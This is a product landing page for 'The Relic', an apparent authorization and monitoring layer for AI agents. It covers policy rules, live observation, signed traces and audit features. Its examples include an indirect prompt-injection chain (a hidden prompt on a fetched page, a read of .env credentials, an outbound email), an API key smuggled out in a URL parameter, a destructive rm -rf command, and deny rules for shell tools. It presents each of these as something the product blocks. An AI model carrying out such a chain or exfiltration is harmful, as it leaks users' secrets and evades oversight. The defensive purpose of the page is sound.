See every agent.
Govern every decision.

The Relic is the authorization layer for the agent era.

Quickstart See the platform

/01 · Dashboard

Where your team
runs the fleet.

Trends, denials, top offenders. One screen for the lead.

/02 · Live

Watch your fleet,
live.

Every intent surfaces before the verdict. Click any row to see the call, the parameters, and the rule that decided.

/03 · Policy

Edit. Replay.
Save.

Test every rule against your last 30 days of agent history. Then ship.

app.therelic.dev

acme · prod overview

30 day window

Agents

247

+12 this week

Traces

1.2M

30 days

Denied

3,891

this month

Proposals

8

pending

Runs · last 30 days peak 52k · avg 38k
Top denied targets
execute_command 1,204
web_fetch (entropy) 892
send_email 417
file_write /etc 203
Recent runs
code-assist 24 0 2s
data-ingest 142 3 14s
support-bot 8 0 1m
research 67 12 4m
app.therelic.dev/live
live

Live activity

12 agents reporting · last 60s

all agents ▾
all verdicts ▾

allow

412

deny

7

flagged

2

pending

3

code-assist · prod just now · 8 actions
verdict target rule
allow web_search("relic governance docs") rule:allow-search
allow read_file("./README.md") rule:allow-read
deny execute_command("rm -rf /tmp/cache") rule:deny-shell
allow write_file("./out/summary.md") rule:allow-write
pending web_fetch("github.com/api/repos") rule:evaluating…
data-ingest · prod 0.3s ago
support-bot · staging 1.1s ago
research-agent · dev 2.4s ago
app.therelic.dev/policies/prod

prod / web-agents

selector env=prod tier=web · 47 agents matched

unsaved

# candidate policy

version: "1"

mode: enforce

default: deny

rules:

- id: allow-search

target: "web_search"

action: allow

- id: deny-fetch-with-creds

target: "web_fetch"

when: "url contains 'token='"

action: deny

Replay · last 7 days

would deny

42

previously allowed

would allow

0

previously denied

unchanged

8.1k

verdicts identical

See what's inside the platform

The premise

Agents act on
your behalf.
You can't see what they did.

Files written. APIs called. Commands run. Most works. Some shouldn't have.

The solution

The Relic
puts you in control.

One layer between every agent and every tool it uses. Records what happens. Enforces what shouldn't.

Chapter 1

Observe

Every action, surfaced as it happens.

Chapter 2

Govern

One policy. Every agent. Seconds.

Chapter 3

Audit

A signed record of everything.

How it works

One system.
Four jobs.

Each pillar runs in the same runtime. Same trace chain. Same dashboard.

/01 · Policy Engine

YAML rules, first match wins, default deny.

Glob-matched rules evaluate every tool call, file read, and network request before it executes. Predictable, testable, reviewable.

  • Enforce, audit, or permissive modes
  • Parameter-level glob matching
  • Ed25519 signing, hot-reload

# .tr/policy.yaml

version: "1"

mode: enforce

default: deny

rules:

- id: allow-search

target: "web_search"

action: allow

- id: deny-shell

target: "{shell,bash,exec}"

action: deny

/02 · Exfiltration Guard

Catch secrets before they leave.

Shannon entropy and pattern matching detect API keys, JWTs, and tokens smuggled in outbound URL parameters, even through hosts the policy allows.

  • Regex patterns for keys, JWTs, PATs
  • Sequence detection for attack chains
  • Blocks indirect prompt injection

# Agent attempts data exfiltration

tool_call: web_fetch

url: api.com/log?token=sk_live_4eC39H...

DENIED exfiltration:pattern

"Stripe key detected in query params"

# Sequence attack blocked

1. web_fetch: external page w/ hidden prompt

2. read_file: reads .env credentials

3. send_email: BLOCKED

DENIED sequence:fetch-read-send

/03 · Live Observation

Every action, as it happens.

Per-agent swimlanes stream over SSE. Intent surfaces before the verdict. The whole fleet on one screen, no setup.

  • Intent → verdict in the same row
  • Filter by agent, tool, or verdict
  • Redacted at the edge. No secrets in transit

Live · 4 agents

streaming
code-assistnow
data-ingest0.3s
support-bot1.1s
research2.4s

/04 · Trace Audit

A signed record of everything.

NDJSON traces with HMAC-SHA256 integrity chains. Tamper-evident, redacted, searchable from the CLI or dashboard.

  • Cryptographically chained
  • Replayable under any policy
  • Pushable to the hosted platform
.tr/traces/01JD8K…trtrace ✓ chain valid

# NDJSON · HMAC-SHA256 chain

{"t":"run","agent":"code-assist","mode":"enforce"}

{"t":"action","target":"read_file","auth":"allow"}

{"t":"action","target":"exec","auth":"deny"}

{"t":"run_end","total":24,"denied":3,"hmac":"a4f2…"}

$ relic trace search --denied --last 24h

3 denied actions across 2 runs

What it governs

Every framework.
Every tool call.

Wraps the agent process itself. Nothing to integrate.

Frameworks & protocols

MCP

Model Context Protocol

Claude Desktop

stdio MCP

OpenClaw

native runtime

LangChain

tool callbacks

OpenAI Agents SDK

function calls

Vercel AI SDK

streaming tools

Anthropic SDK

tool use API

AutoGen

multi-agent

HTTP / HTTPS

REST & webhooks

gRPC

server streaming

Python

wraps the process

Node · Go · Bun

any runtime

Surfaces governed

tool_call

glob-matched targets

web_fetch

URL + headers + body

web_search

query inspection

file_read / write

mount-scoped

execute_command

shell + args

send_email

recipients + body

db_query

SQL inspection

network egress

DNS allow/deny

mcp.tool_call

every MCP method

mcp.resource_read

per-resource

prompt_inject

detected upstream

custom

protocol of your own

Built for the audit

Audit-grade by default.

The platform ships SSO, signed evidence, and OTEL out of the box. The same record your engineers debug from is the record your auditor reviews.

SSO & provisioning

OIDC PKCE, SCIM tokens, invites.

Plug Okta, Entra, Auth0, Google. Mint SCIM tokens for provisioning. Revoke any session from the dashboard.

Compliance mappings

SOC 2, ISO 27001, HIPAA.

Open-source YAML maps every control to the code + docs that substantiate it. Diff it on GitHub.

Evidence pack

Signed tarball. One command.

relic-api evidence-pack --framework=soc2-cc. Hand it to the auditor; they verify with the reference Python tool.

OTEL + SIEM

Splunk, Datadog, Honeycomb.

One OTLP/HTTP endpoint covers every major backend. Policy decisions, ingest spans, login events.

Hardened by design

  • HSTS preload
  • CSRF double-submit
  • Strict CSP
  • Pre-signed S3 reads
  • Per-IP login rate limits
  • Read-replica routing
  • HMAC trace chains
  • External pen test

Backup & DR

relic-api backup --include-blobs produces a single tarball that restores to a fresh deployment with zero prior S3 history. Documented runbook for the on-call rotation.

The stack

Two pieces.
One control plane.

Runtime runs with your agent. Platform runs at app.therelic.dev.

Open source · Apache 2.0

relic · the runtime

A single Go binary. Wraps any agent. Enforces locally, traces locally, never phones home.

$ brew install therelicai/tap/relic

$ relic init

$ relic run -- python agent.py

View on GitHub
Hosted · app.therelic.dev

Platform · the team dashboard

Where the team converges. Live feed. Policy editor. Audit log. SSO and roles.

Dashboard

KPIs, charts, runs

Live

Per-agent swimlanes

Traces

Timeline + JSON

Agents

Fleet inventory

Proposals

YAML diff

Policy editor

Replay-and-diff

Audit log

Every action

Identity

SSO, SCIM, sessions

Settings

Keys, team, billing

Request platform access

A tour of the platform

Eight pages.
One mental model.

Every page exists because a specific person needs it: the engineer, the reviewer, the auditor, the lead.

Dashboard

/

KPI cards with trend indicators, run volume chart, denial rate by agent, sortable runs table.

Live

/live

Per-agent swimlanes of intent and verdict events arriving over SSE. The intent shows what the agent is about to do; the verdict overwrites it in place.

Trace Viewer

/traces/:runId

Per-run metadata with tabbed view: event timeline, detail key-values, raw JSON. Chain integrity is verified on load.

Agents

/agents

Sortable, filterable inventory of every registered agent with expandable detail panels and labels.

Proposals

/proposals

Split-pane queue of policy proposals: list with status filters on the left, YAML diff and approve/reject on the right.

Policy Editor

/policies

Selector-driven editor with a replay-and-diff badge. Type env=prod and the editor previews matched agents and the verdicts that would change.

Audit Log

/audit

Paginated table of every platform action: proposal decisions, key creation, team changes. For compliance review.

Identity

/settings/identity

SSO (OIDC) configuration, SCIM provisioning tokens, invites, active session list with admin revoke.

Settings

/settings

Account, API keys, team management, billing, notification preferences.

How it fits together

The runtime stays
where the agent runs.

All enforcement happens locally. The platform only ever sees what you push. Signed and redacted.

Your infrastructure

Agent + relic CLI

Local enforcement. Tamper-evident traces.

relic trace push

HTTPS, signed

app.therelic.dev

Platform API + UI

Stored, indexed, searchable.

SSO login

HTTPS, browser

Your team

SecOps console

Review, approve, investigate.

No runtime telemetry

The CLI makes zero outbound calls unless you opt in to push traces.

Redacted at the edge

Secrets are stripped before the trace leaves the agent's host.

SSO, RBAC, audit log

Every action on the platform is itself recorded for compliance review.

Get started

Three commands.
Governed agents.

01

Install

A single binary, no dependencies.

$ brew install therelic/tap/relic
02

Configure

Initialize a .tr/ directory with starter rules.

$ relic init
03

Govern

Wrap your agent. Every action is observed, evaluated, traced.

$ relic run -- python agent.py

Make your agents
accountable.

Free. Open source. Five minutes to first verdict.

Full quickstart → · Request platform access →